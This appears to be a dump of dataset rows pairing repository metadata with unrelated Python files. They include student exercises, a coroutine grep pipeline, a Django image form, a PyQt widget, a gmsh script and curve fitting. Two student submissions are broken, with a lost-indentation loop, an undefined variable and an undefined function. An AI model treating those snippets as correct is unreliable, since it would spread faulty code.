d6915f891d241df17076fd4aac05f43ece785f6d | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/10/usersdata/73/23003/submittedfiles/testes.py | 946f242d6568fd56d5fe56ac4d96a251e4c428f5 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | # -*- coding: utf-8 -*-
from __future__ import division
qs=input('quantidade de salas:')
for i in range (0,qs,1):
sala=[]
sala.append(input('quantidade de vidas da sala:'))
print sala
pe=input('porta de entrada:')
ps=input('porta de saída:')
soma=0
for i in range(sala[pe],sala[ps]+1,1):
a=sala[pe+i]
soma=soma+a
if sala[pe]==sala[ps]:
break
print s | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
522e260b84afd3a41e0c49124e442dacd6830b89 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_055/ch147_2020_04_12_04_04_45_284109.py | 49542792d1c1e1124502b5db7a53e21506d70c53 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | def mais_frequente(lista_palavras):
contagem = {}
for palavra in lista_palavras:
if palavra not in contagem:
contagem[palavra] = 1
else:
contagem[palavra] += 1
max_value = index(max(contagem.values()))
return max_value | [
"you@example.com"
] | you@example.com |
d59bcbbad39d74bcd294b6117bc8ca2b88bc83fe | 4f0385a90230c0fe808e8672bb5b8abcceb43783 | /LNH/day4-teacher/5 面向过程编程.py | 77d4e49cfd933d7a8fd11f330b2d27488f5bcdea | [] | no_license | lincappu/pycharmlearningproject | 4084dab7adde01db9fa82a12769a67e8b26b3382 | b501523e417b61373688ba12f11b384166baf489 | refs/heads/master | 2023-07-10T05:21:15.163393 | 2023-06-29T14:02:35 | 2023-06-29T14:02:35 | 113,925,289 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,798 | py | '''
强调:面向过程编程绝对不是用函数编程那么简单
面向过程的编程思想:核心是过程二字,过程即解决问题的步骤,即先干什么再干什么
基于该思想去编写程序就好比在设计一条流水线,是一种机械式的编程思想
优点:复杂的问题流程化,进而简单化
缺点:可扩展性差
'''
# import os
# g=os.walk(r'C:\Users\Administrator\PycharmProjects\19期\day4\a')
# for dirname,_,files in g:
# for file in files:
# abs_file_path=r'%s\%s' %(dirname,file)
# print(abs_file_path)
#grep -rl 'root' /etc
import os
def init(func):
def inner(*args,**kwargs):
g=func(*args,**kwargs)
next(g)
return g
return inner
def search(filepath,target): #找到一个文件路径就往下个阶段传一次
g = os.walk(filepath)
for dirname, _, files in g:
for file in files:
abs_file_path = r'%s\%s' % (dirname, file)
target.send(abs_file_path)
@init
def opener(target):
while True:
abs_file_path=yield
with open(abs_file_path,'rb') as f:
target.send((f,abs_file_path))
@init
def cat(target):
while True:
f,abs_file_path=yield
for line in f:
res=target.send((line,abs_file_path))
if res:
break
@init
def grep(pattern,target):
tag=False
pattern = pattern.encode('utf-8')
while True:
line,abs_file_path=yield tag
tag=False
if pattern in line:
target.send(abs_file_path)
tag=True
@init
def printer():
while True:
abs_file_path=yield
print(abs_file_path)
search(r'C:\Users\Administrator\PycharmProjects\19期\day4\a',opener(cat(grep('你好',printer()))))
| [
"lincappu@163.com"
] | lincappu@163.com |
38ffb9f0f778b5e8343554b367df1434ad7e94bf | 8fcc27160f8700be46296568260fa0017a0b3004 | /client/dogma/eventCounters.py | abbf36a0815d4c95154b8703ffd3d80fd198ea7f | [] | no_license | connoryang/dec-eve-serenity | 5d867f4eedfa896a4ef60f92556356cafd632c96 | b670aec7c8b4514fc47cd52e186d7ccf3aabb69e | refs/heads/master | 2021-01-22T06:33:16.303760 | 2016-03-16T15:15:32 | 2016-03-16T15:15:32 | 56,389,750 | 1 | 0 | null | 2016-04-16T15:05:24 | 2016-04-16T15:05:24 | null | UTF-8 | Python | false | false | 1,191 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\packages\dogma\eventCounters.py
from contextlib import contextmanager
class EventCount(object):
def __init__(self):
self.__eventCount = {}
@contextmanager
def Event(self, key):
self._AddEventCount(key)
try:
yield
finally:
self._DecreaseEventCount(key)
self._OnEvent(key)
def _AddEventCount(self, key):
if key not in self.__eventCount:
self.__eventCount[key] = 1
else:
self.__eventCount[key] += 1
def _DecreaseEventCount(self, key):
self.__eventCount[key] -= 1
if self.__eventCount[key] < 1:
del self.__eventCount[key]
def IsEventHappening(self, key):
if key is None:
return False
return self.__eventCount.get(key, 0) > 0
def _OnEvent(self, key):
pass
class BrainUpdate(EventCount):
def __init__(self, callback):
super(BrainUpdate, self).__init__()
self.__callback = callback
def _OnEvent(self, key):
self.__callback(key)
| [
"masaho.shiro@gmail.com"
] | masaho.shiro@gmail.com |
f989dc9c65e8f3ba691c10722a36b9be7e818a0a | e7bba3dd662bf2778c36a406f72ee93b2ea05e11 | /CardinalityEstimationTestbed/Overall/quicksel/test/python/test_include.py | 4f19223fb4f8307520b7d4b1f74308bb4c36e7ba | [
"Apache-2.0"
] | permissive | TsinghuaDatabaseGroup/AI4DBCode | 37e45b176bc94e77fe250ea45f0ad7b9054c7f11 | a8989bfadcf551ee1dee2aec57ef6b2709c9f85d | refs/heads/master | 2023-07-07T05:42:15.590000 | 2023-07-04T01:04:15 | 2023-07-04T01:04:15 | 217,175,047 | 53 | 35 | null | 2023-06-20T13:00:17 | 2019-10-24T00:03:14 | Scala | UTF-8 | Python | false | false | 688 | py | import sys
sys.path.append('../../src/python')
# isomer = imp.load_source('isomer', '../../src/python/isomer.py')
# import imp
import pprint
from quickSel import isomer
pp = pprint.PrettyPrinter(indent=2)
def Node(query):
return isomer.STHoles2d(query.boundary, [query])
def Query(boundary, freq, uid=None):
return isomer.Query2d(boundary, freq, uid)
def Boundary(boundary):
return isomer.Boundary(boundary)
qid = [0]
def gen_query(boundary):
boundary = isomer.Boundary(boundary)
freq = (boundary.r - boundary.l) * (boundary.t - boundary.b)
query = Query(boundary, freq, qid[0])
qid[0] = qid[0] + 1
return query
| [
"zhouxuan19@mails.tsinghua.edu.cn"
] | zhouxuan19@mails.tsinghua.edu.cn |
a35bae9f502d173b1fff236cf84aff4322441cb5 | a2211f0ef8297a77200a0b2eec8ba3476989b7e6 | /itcast/02_python核心编程/03_网络编程/day03_网络通信过程/demo16_网络通信过程中的MAC地址_IP地址.py | 25e25fb3f3e669b8dbe1ab7815b5d62ae64cb664 | [] | no_license | qq1197977022/learnPython | f720ecffd2a70044f1644f3527f4c29692eb2233 | ba294b8fa930f784304771be451d7b5981b794f3 | refs/heads/master | 2020-03-25T09:23:12.407510 | 2018-09-16T00:41:56 | 2018-09-16T00:42:00 | 143,663,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 458 | py | # 一.通信过程中
# 1.源/目的MAC地址在两个设备间变化
# 2.源/目的IP地址不变
# 二.总结
# 1.MAC地址: 唯一标识数据转发的实际网卡地址
# 2.IP地址: 唯一标识逻辑地址
# 3.网络掩码: 协助确认网络号
# 4.默认网关: 目的IP不在同一网段时, 转发给默认网关
# 5.端口: 唯一标识非同一台设备上的应用
# 6.PED: 唯一标识同一台设备上的应用
| [
"1197977022@qq.com"
] | 1197977022@qq.com |
169f65f33b732b562e5b9cf615068dbd751fd4ed | f39c2c500873180d953ab9a7b22a4f6df95fb1c3 | /Bloomberg/Design Underground System.py | 314a6c31b7b94a5f58dc9fbfad3485ba36f8756c | [] | no_license | Jason003/interview | 458516f671d7da0d3585f89b098c5370edcd9f04 | e153306b85c3687b23a332812a0885d25ecce904 | refs/heads/master | 2021-07-15T15:28:07.175276 | 2021-02-05T03:21:59 | 2021-02-05T03:21:59 | 224,898,150 | 2 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,406 | py | '''
经典地铁题,原题解法就不说了,地里也有很多资源。 主要讲下follow up。
国女问了哪些edge case可以导致error, 我说了两种,一是check out的时候id在map中不存在,
二是check out的时候id对应的时间t大于之前之前check in时的时间。国女表示满意,
又问了运行过程中可能出现哪些情况导致地铁出问题。我说可能有些check in了但是把地铁卡弄丢了没有checkout,
id在memory中积压了很多最后导致memory不够。 解决方法是定期检查已经存储的数据,
如果start time间隔很久的就可以直接remove。
三哥也问了一个follow up,因为我在check out的map里存的是route, 如果之后需要该站点名怎么办。
我说在route里可以用station id,然后单独建一个station name到station id的map,三哥表示满意。
'''
import collections
class UndergroundSystem:
def __init__(self):
self.station_time, self.user = collections.defaultdict(list), {}
def checkIn(self, id, stationName, t):
self.user[id] = (stationName, t)
def checkOut(self, id, stationName, t):
self.station_time[self.user[id][0], stationName].append(t - self.user[id][1])
def getAverageTime(self, startStation, endStation):
return sum(self.station_time[startStation, endStation]) / len(self.station_time[startStation, endStation]) | [
"jiefanli97@gmail.com"
] | jiefanli97@gmail.com |
d46a46d06171563485050b9203c957d38c0d0829 | 9f2445e9a00cc34eebcf3d3f60124d0388dcb613 | /2019-11-13-kineticfeatures/hhfitting_minimize_all.py | 65943f142fdd8a7ddda864998cb0f6a72011bff9 | [] | no_license | analkumar2/Thesis-work | 7ee916d71f04a60afbd117325df588908518b7d2 | 75905427c2a78a101b4eed2c27a955867c04465c | refs/heads/master | 2022-01-02T02:33:35.864896 | 2021-12-18T03:34:04 | 2021-12-18T03:34:04 | 201,130,673 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,359 | py | #exec(open('hhfitting_minimize.py').read())
#Using fmin
import h5py
import numpy as np
import matplotlib.pyplot as plt
import os
from scipy import signal
from scipy.optimize import minimize
from scipy.optimize import curve_fit
from scipy.optimize import Bounds
# We do it for cell rCell10070.nwb
# Take from 993 to 5987 idx which is 100.3ms to 599.7ms
# First we extract the trace, then fit individual trace and then in a loop collect for all inf and tau values.
# In another file we check if the model also fits to the deactivation traces.
levelnum = 13
reader = h5py.File('../../Raw_data/Channelpedia/Kv1.1/DataKv1.1RatCHO/rCell10070.nwb')
data = reader['acquisition']['timeseries']['Activation']['repetitions']['repetition2']['data']
leak = np.mean(data[993:5987,4]*1e-9)
G = (np.transpose(data[993:5987,:])*1e-9 - np.transpose(leak))/(np.arange(-0.090,0.090,0.010)+0.0962)[:,None]
Gnorm = G/np.max(G)
t = np.arange(0,len(Gnorm[levelnum])/10000,1/10000)
# plt.figure(1)
# plt.plot(np.transpose(G))
# plt.figure(2)
# plt.plot(data[993:5987,4:15])
# plt.show()
def kineticfunc_array(minfV, mtauV, hinfV, htauV, min, hin, mpow, hpow):
#Assuming that at time=0, the channel is at steady state at -80mV.
m = minfV + (min-minfV)*np.exp(-t/mtauV)
h = hinfV + (hin-hinfV)*np.exp(-t/htauV)
return m**mpow*h**hpow
def error(x):
minfV, mtauV, hinfV, htauV = x
min, hin, mpow, hpow = 0,1,1,1
return np.sum((kineticfunc_array(minfV, mtauV, hinfV, htauV, min, hin, mpow, hpow) - Gnorm[levelnum])**2)
bounds = Bounds([0,0.00001,0,0.0001],[1,1,1,1])
#bb = [(0,100e-8),(0.1),(1e-5,1),(0,1),(1e-4,1)]
# minimum = minimize(error, [3,1,0.005,0.05,0.050,0,1,1,1], method='L-BFGS-B', bounds=bounds)
# minimum = minimize(error, [3,1,0.005,0.05,0.050,0,1,1,1], method='TNC', bounds=bounds)
# minimum = minimize(error, [1,0.005,0.05,0.050,0,1], method='Nelder-Mead', bounds=bounds)
# minimum = minimize(error, [5e-8,1,0.0005,0.25,0.1], method='trust-constr', bounds=bounds)
for level in np.arange(-0.040,0.060,0.010):
levelnum = int((level+0.060)/0.010)
minimum = minimize(error, [1,0.005,0.05,0.050], method='Nelder-Mead', bounds=bounds)
print(minimum.x)
plt.plot(t,Gnorm[levelnum])
plt.plot(t,kineticfunc_array(*minimum.x, *[0,1,1,1]))
# plt.plot(t,kineticfunc_array(*[10e-8,1,0.0005,0.25,0.1], *[0,1,1,1]))
plt.show()
| [
"analkumar2@gmail.com"
] | analkumar2@gmail.com |
2b51bb93386e0ac1b6f86ceadeaa9b0d86f1bacf | e7b6364245adec14cc47cbe5f2206afcba81d734 | /main/models.py | 8cc8cc3d931e5710e1e23fd46cacecd70d4e3f28 | [] | no_license | anaf007/myapp | 255cd3476fe05f9e063c96c3dc535e7089cf317f | 90e2da4a4e0ec1d10620609cfa59f58a78fed08b | refs/heads/master | 2020-03-24T05:14:03.174477 | 2018-08-02T09:33:30 | 2018-08-02T09:33:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 194 | py | from main.extensions import login_manager
from main.user.models import User
@login_manager.user_loader
def load_user(user_id):
"""Load user by ID."""
return User.get_by_id(int(user_id)) | [
"anaf@163.com"
] | anaf@163.com |
81c8562b87597fa5954ae5a0d9f29bf0e1dc7a0c | b7cb4d7a14b4d15741ca18c7d6159f2e755e49ff | /pysurrogate/util/usage.py | 59a844e65cf5b88dad879e7ee0d08d1e95a0d576 | [
"MIT"
] | permissive | mberkanbicer/pysurrogate | eb270099d452602d41368ae08f0e70d03b945018 | 6fe58f157920ef7819bcd4756342b2ca778f43b8 | refs/heads/master | 2023-03-16T00:46:11.221702 | 2018-09-12T18:26:53 | 2018-09-12T18:26:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,723 | py | import numpy as np
import matplotlib.pyplot as plt
from pysurrogate.optimize import fit, predict
if __name__ == '__main__':
# number of samples we will use for this example
n_samples = 20
# ---------------------------------------------------------
# Example 1: One input variable and one target
# ---------------------------------------------------------
X = np.random.rand(n_samples, 1) * 4 * np.pi
Y = np.cos(X)
# fit the model and predict the data
model = fit(X, Y, n_folds=3, disp=True, normalize_X=True, normalize_Y=True)
_X = np.linspace(0, 4 * np.pi, 1000)
_Y = predict(model, _X)
plt.scatter(X, Y, label="Observations")
plt.plot(_X, _Y, label="True")
plt.show()
# ---------------------------------------------------------
# Example 2: Two input variables and two targets.
# Normalize before building the model and use only an RBF implementation with a specific kernel
# Finally validate the model error on the true function.
# ---------------------------------------------------------
X = (np.random.rand(n_samples, 2) * 200) + 500
func_eval = lambda X: np.concatenate([np.sum(np.square(X), axis=1)[:, None], np.sum(np.sqrt(X), axis=1)[:, None]], axis=1)
Y = func_eval(X)
# fit the model and predict the data
model = fit(X, Y, n_folds=3, disp=True, normalize_X=True, normalize_Y=True)
# create two dimensional data to test the
M = np.meshgrid(np.linspace(100, 200, 1000), np.linspace(100, 200, 1000))
_X = np.concatenate([X[:, :, None] for e in X], axis=2).reshape(n_samples * n_samples, 2)
_Y = predict(model, _X)
print(np.mean(np.abs(_Y - func_eval(_X)), axis=0))
| [
"jules89@arcor.de"
] | jules89@arcor.de |
6ce2efa1815bfbcb8520ef0ef62c4d9a19a81325 | 46e9fc0fc20a58026d35a163c7201f1b40844ce8 | /src/widgets/music_table_widget.py | cc86686d7da19ee6e19240dc84ed25d9aaa756ad | [
"MIT"
] | permissive | kiragoo/FeelUOwn | c47d09bd8f1ee6200ebd5c8a0de30e5b6f403d22 | 07b88b452af873f1596a1cbf551a21ffc940cb94 | refs/heads/master | 2021-05-29T23:25:51.556985 | 2015-08-05T09:14:33 | 2015-08-05T09:14:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,877 | py | # -*- coding:utf8 -*-
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from base.logger import LOG
class MusicTableWidget(QTableWidget):
"""显示音乐信息的tablewidget
"""
signal_play_music = pyqtSignal([int], name='play_music')
signal_remove_music_from_list = pyqtSignal([int], name='remove_music_from_list')
def __init__(self, rows=0, columns=5, parent=None):
super().__init__(rows, columns, parent)
self.__row_mid_map = [] # row 为 index, mid为值
self.__special_focus_out = False
self.__signal_mapper = QSignalMapper() # 把remove_music按钮和mid关联起来
self.__set_prop()
self.__init_signal_binding()
def __set_objects_name(self):
pass
def __init_signal_binding(self):
self.cellDoubleClicked.connect(self.on_cell_double_clicked)
self.cellClicked.connect(self.on_remove_music_btn_clicked)
def __set_prop(self):
self.horizontalHeader().setSectionResizeMode(0, QHeaderView.Stretch)
self.horizontalHeader().setDefaultAlignment(Qt.AlignLeft)
self.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.setSelectionBehavior(QAbstractItemView.SelectRows)
self.setHorizontalHeaderLabels([u'歌曲名',
u'歌手',
u'专辑名',
u'时长'])
self.setShowGrid(False) # item 之间的 border
self.setMouseTracking(True)
self.setFocusPolicy(Qt.StrongFocus)
self.setWindowFlags(Qt.FramelessWindowHint)
self.setAlternatingRowColors(True)
def focusOutEvent(self, event):
self.close()
def add_item_from_model(self, music_model):
if self.is_item_already_in(music_model['id']) is not False: # is
return False
artist_name = ''
music_item = QTableWidgetItem(music_model['name'])
album_item = QTableWidgetItem(music_model['album']['name'])
if len(music_model['artists']) > 0:
artist_name = music_model['artists'][0]['name']
artist_item = QTableWidgetItem(artist_name)
duration = music_model['duration']
m = int(duration / 60000)
s = int((duration % 60000) / 1000)
duration = str(m) + ':' + str(s)
duration_item = QTableWidgetItem(duration)
music_item.setData(Qt.UserRole, music_model)
row = self.rowCount()
self.setRowCount(row + 1)
self.setItem(row, 0, music_item)
self.setItem(row, 1, artist_item)
self.setItem(row, 2, album_item)
self.setItem(row, 3, duration_item)
btn = QLabel()
btn.setToolTip(u'从当前播放列表中移除')
btn.setObjectName('remove_music') # 为了应用QSS,不知道这种实现好不好
self.setCellWidget(row, 4, btn)
# btn.clicked.connect(self.__signal_mapper.map)
# self.__signal_mapper.setMapping(btn, music_model['id'])
# self.__signal_mapper.mapped.connect(self.on_remove_music_btn_clicked)
self.setRowHeight(row, 30)
self.setColumnWidth(4, 30)
row_mid = dict()
row_mid['mid'] = music_model['id']
row_mid['row'] = row
return True
def set_songs(self, tracks):
self.setRowCount(0)
for track in tracks:
self.add_item_from_model(track)
def is_item_already_in(self, mid):
row = self.find_row_by_mid(mid)
if row is not None:
return row
return False
def focus_cell_by_mid(self, mid):
row = self.find_row_by_mid(mid)
self.setCurrentCell(row, 0)
self.setCurrentItem(self.item(row, 0))
self.scrollToItem(self.item(row, 0))
def find_row_by_mid(self, mid):
row = False
total = self.rowCount()
i = 0
while i < total:
item = self.item(i, 0)
data = item.data(Qt.UserRole)
tmp_mid = data['id']
if tmp_mid == mid:
row = i
break
i += 1
return row
def find_mid_by_row(self, row):
item = self.item(row, 0)
data = item.data(Qt.UserRole)
mid = data['mid']
return mid
@pyqtSlot(int, int)
def on_cell_double_clicked(self, row, column):
item = self.item(row, 0)
music_model = item.data(Qt.UserRole)
self.signal_play_music.emit(music_model['id'])
@pyqtSlot(int, int)
def on_remove_music_btn_clicked(self, row, column):
if column != 4:
return
item = self.item(row, 0)
data = item.data(Qt.UserRole)
mid = data['id']
row = self.find_row_by_mid(mid)
self.removeRow(row)
self.signal_remove_music_from_list.emit(mid) | [
"yinshaowen241@gmail.com"
] | yinshaowen241@gmail.com |
8784fdd39fd7940c5323ecb33a5d20bc0be6b2c1 | 4160b450b052830e17457a0412e29414f67caea5 | /goods/apps.py | 42618868a73474215ce8f280268254282c223de0 | [] | no_license | mnogoruk/fastcustoms | 6ad7b058607ddf4d2b56a09e23e66fcfb43be1a7 | 4c3bf7f9f1d4af2851f957a084b6adc2b7b7f681 | refs/heads/master | 2023-08-23T15:54:08.415613 | 2021-10-31T12:21:29 | 2021-10-31T12:21:29 | 372,066,847 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 142 | py | from django.apps import AppConfig
class CargoConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'goods'
| [
"lionless072@gmail.com"
] | lionless072@gmail.com |
2e18bb631907b32d1f4cdde82bdb2a57e871174f | 746a9c1f65674cd5bcdce6dbd1971b6a16345f9d | /images/forms.py | dd89b8853a27fc1fdb599041349f517c15c147a7 | [] | no_license | mazulo/bookmarks | 4dc25dc09772663c65698d3cc9f5b653fd409ba9 | 5c2ce3c3ad811466c63f7b0f3a21bf33a6a28f5e | refs/heads/master | 2021-01-10T07:23:37.185414 | 2016-03-23T06:40:53 | 2016-03-23T05:40:53 | 54,158,063 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,305 | py | from urllib import request
from django import forms
from django.core.files.base import ContentFile
from django.utils.text import slugify
from .models import Image
class ImageCreateForm(forms.ModelForm):
class Meta:
model = Image
fields = ('title', 'url', 'description')
widgets = {
'url': forms.HiddenInput,
}
def clean_url(self):
url = self.cleaned_data['url']
valid_extensions = ['jpg', 'jpeg']
extension = url.rsplit('.', 1)[1].lower()
if extension not in valid_extensions:
raise forms.ValidationError(
'The given URL does not match valid image extensions.'
)
return url
def save(self, force_insert=False, force_update=False, commit=True):
image = super(ImageCreateForm, self).save(commit=False)
image_url = self.cleaned_data['url']
image_name = '{}.{}'.format(
slugify(image.title),
image_url.rsplit('.', 1)[1].lower()
)
# download image from the given URL
response = request.urlopen(image_url)
image.image.save(
image_name,
ContentFile(response.read()),
save=False
)
if commit:
image.save()
return image
| [
"pmazulo@gmail.com"
] | pmazulo@gmail.com |
846a5e2ab2a378670c30bbbbae0fcf1e5f6f4070 | 23fddc940a266c2d1d0e0b1687c36cdbcc9d54d9 | /test/unittest/line_up/line_up_test.py | adc7a590bbb62f34cfffe5488ea14b34016d80ec | [] | no_license | Cuick/traversing | 210fcfb1c780037de59343fffeb4fa4d3f2eae32 | c78982580af7f63c8bff4dcb37005b7f7c682b5b | refs/heads/master | 2021-01-10T17:38:37.899460 | 2016-11-18T06:06:55 | 2016-11-18T06:06:55 | 55,397,540 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 770 | py | # -*- coding:utf-8 -*-
"""
created by server on 14-7-14下午6:12.
"""
from test.unittest.base.base_test_case import BaseTestCase
import unittest
class LineUpTest(BaseTestCase):
"""test heros_component and hero"""
def test_add_hero(self):
line_up_component = self.player.line_up_component
line_up_component.change_hero(2, 10001, 1)
def test_hero_link(self):
line_up_slot = self.player.line_up_component.line_up_slots.get(2)
hero_slot = line_up_slot.hero_slot
self.NotEqual(hero_slot.link_skill_ids, [])
def test_set_equip(self):
line_up_slot = self.player.line_up_component.line_up_slots.get(2)
self.NotEqual(line_up_slot.set_equ_skill_ids, [])
if __name__ == '__main__':
unittest.main()
| [
"zxzxck@163.com"
] | zxzxck@163.com |
8b92a7c9c58837640882ba3dee0dcaebc67d62bf | 2383bf5a3b58e468d65713c361718795d51f1b97 | /python/call_test.py | 99c1f81aec4011b55d157f082bfafc64cf379f12 | [
"MIT"
] | permissive | rec/test | 3f4fb6614729ebc72d130888a8a9bc550f92988c | a260b9bf7fea96867e64163d3c891c2e2091f636 | refs/heads/master | 2023-08-03T13:49:24.347294 | 2023-07-28T09:19:39 | 2023-07-28T09:19:39 | 65,399,133 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 337 | py | class Call1(object):
def __call__(self, x):
return x
class Call2(object):
def __init__(self):
self.call = lambda x: x
def __call__(self, x):
return self.call(x)
class Call3(object):
def __init__(self):
self.__call__ = lambda x: x
print(Call1()(3))
print(Call2()(3))
print(Call3()(3))
| [
"tom@swirly.com"
] | tom@swirly.com |
55048821cc9cb29b98bdf0c56f5b9d6d22ccaed8 | 0a9949a7dbe5f7d70028b22779b3821c62eb6510 | /static/statistic_struct/user portrait_0430/dynamic_analysis/code_test.py | f774cc12c9f529669c7813a4082b3099290f2e91 | [] | no_license | 744996162/warehouse | ed34f251addb9438a783945b6eed5eabe18ef5a2 | 3efd299a59a0703a1a092c58a6f7dc2564b92e4d | refs/heads/master | 2020-06-04T22:10:14.727156 | 2015-07-03T09:40:09 | 2015-07-03T09:40:09 | 35,603,929 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 162 | py | #ecoding=utf-8
__author__ = 'Administrator'
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
str = '\xe5\x88\xb0\xe8\xbe\xbe'
print(str.encode("utf-8")) | [
"744996162@qq.com"
] | 744996162@qq.com |
d1c9d99e2b1639d463275d911bda31fdb8d8aea9 | ce8ffe238c510f8a80b42aa897ab0ce29698445d | /finfet_ex/finfet/moscap3d.py | 5ccc6333cfd4fa29bd590093e3f9a7177e40537e | [] | no_license | devsim/devsim_misc | 4d29d58314f29cb08939c3580fee24f441f55b50 | 9a3c7056e0e3e7fc49e17031a706573350292d4d | refs/heads/main | 2022-07-20T21:08:08.780498 | 2022-06-27T02:22:11 | 2022-06-27T02:22:11 | 191,487,676 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,331 | py |
import pygmsh
import bool_common
geom = pygmsh.opencascade.Geometry(
#characteristic_length_min=.1,
#characteristic_length_max=2.5e-5
)
w=1
h=1
tox=3
tsi=60
xrf=-0.1
trf=3
l_contact=1
#tcl0=0.5 #cl in ox
#tcl1=0.05 #cl near interface
#tcl2=0.5
#tcl3=0.5 #cl near backside
lcar=0.3
lrf=0.1
gate=bool_common.create_box_volume(geom, h=h, w=w, l=l_contact, x=-tox-l_contact, z=0, lcar=lcar)
ox=bool_common.create_box_volume(geom, h=h, w=w, l=tox, x=-tox, z=0, lcar=lcar)
#rf=bool_common.create_box_volume(geom, h=h, w=w, l=trf, x=0, z=0, lcar=lcar)
si=bool_common.create_box_volume(geom, h=h, w=w, l=tsi, x=0, z=0, lcar=lcar)
sub=bool_common.create_box_volume(geom, h=h, w=w, l=l_contact, x=tsi, z=0, lcar=lcar)
all_volumes=[ox, si, gate, sub]
geom.boolean_fragments( all_volumes,[], delete_first=True, delete_other=False)
#['gate', 'sub', 'interface']
#['oxide', 'silicon']
geom.add_physical_volume(gate, 'gate')
geom.add_physical_volume(sub, 'sub')
geom.add_physical_volume(ox, 'ox')
geom.add_physical_volume(si, 'si')
# TODO: add refinement box
#
mydict = {
"lrf" : lrf,
"lcar" : lcar,
"trf" : trf,
"xrf" : xrf,
"w" : w,
"h" : h,
}
with open('moscap3d.geo', 'w') as ofh:
ofh.write('''\
// This option may be important for background mesh
//Mesh.CharacteristicLengthExtendFromBoundary=0; /* do not extend from boundary points */
//Mesh.Algorithm3D=1 /* 1 is Delaunay, Tetgen */
//Mesh.CharacteristicLengthMax = 1; /*maximum characteristic length */
//Mesh.CharacteristicLengthMin = 0; /*maximum characteristic length */
//Mesh.CharacteristicLengthFromCurvature = 1
//Mesh.CharacteristicLengthFromPoints = 1
//Mesh.CharacteristicLengthExtendFromBoundary=0;
//Geometry.ScalingFactor=1.0e-7;
//Mesh.CharacteristicLengthMax = 2.5e-5; /*maximum characteristic length */
''')
ofh.write(geom.get_code())
ofh.write("\n")
ofh.write('''
Field[1] = Box;
Field[1].VIn = %(lrf)s;
Field[1].VOut = %(lcar)s;
Field[1].XMin = %(xrf)s;
Field[1].XMax = %(trf)s+%(xrf)s;
Field[1].YMin = -0.5*%(h)s;
Field[1].YMax = +0.5*%(h)s;
Field[1].ZMin = 0;
Field[1].ZMax = %(w)s;
Background Field = 1;
Mesh.CharacteristicLengthExtendFromBoundary = 1;
Mesh.CharacteristicLengthFromPoints = 1;
Mesh.CharacteristicLengthMax = %(lcar)s; /*maximum characteristic length */
''' % mydict)
# ofh.write("Coherence;\n")
| [
"juan@tcad.com"
] | juan@tcad.com |
600cb4a4a0fb0c02fd641c0744d20d4413860cd0 | 8d2abf7ad4c3f35801f6bfdb38a4d6cddf1e0fbd | /0404/demo03.py | b105dd59dfb4f75a1769f41c31d1d8eb5067af08 | [] | no_license | erroren/Python_A | e9dfba73fc09160e4d3b8ea994183e2735f9d36e | 47901316902705e513ea7d6e016f98f1cd2d3e85 | refs/heads/master | 2020-05-04T14:27:29.118843 | 2019-06-13T08:50:03 | 2019-06-13T08:50:03 | 179,197,541 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py | L = [x for x in range(10)]
print(L, type(L), L.__sizeof__())
L1 = (x for x in range(10))
print(L1, type(L1), L1.__sizeof__())
# print(L1.__next__())
def run(L1):
for i in L1:
yield i
r = run(L1)
while True:
try:
print(next(r))
except Exception as e:
print(e)
break
| [
"hcy@qq.com"
] | hcy@qq.com |
7580457f1767cfc3fd8424fd738c1d6e49fa6094 | c0f5d309576f791f8cc062e2d0cad340eec41d7d | /190326_electric_bus_2.py | 0045a43b557135b855703e93b6422e9e110f0f7f | [] | no_license | mjjin1214/algorithm | fa91455ab792c38d01fd210c12e53e50f516eb55 | 423119406061443939b4b966c7d9f1513544dd03 | refs/heads/master | 2020-04-22T19:31:23.981387 | 2019-04-05T07:58:10 | 2019-04-05T07:58:10 | 170,610,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 466 | py | import sys
sys.stdin = open('input1.txt')
def backtrack(x, count):
global min_count
if count >= min_count:
return
if x >= data[0]:
if min_count > count:
min_count = count
return
for i in range(data[x], 0, -1):
backtrack(x+i, count+1)
T = int(input())
for t in range(T):
data = list(map(int, input().split()))
min_count = data[0]
backtrack(1, 0)
print('#{} {}'.format(t+1, min_count-1)) | [
"moc0etan@gmail.com"
] | moc0etan@gmail.com |
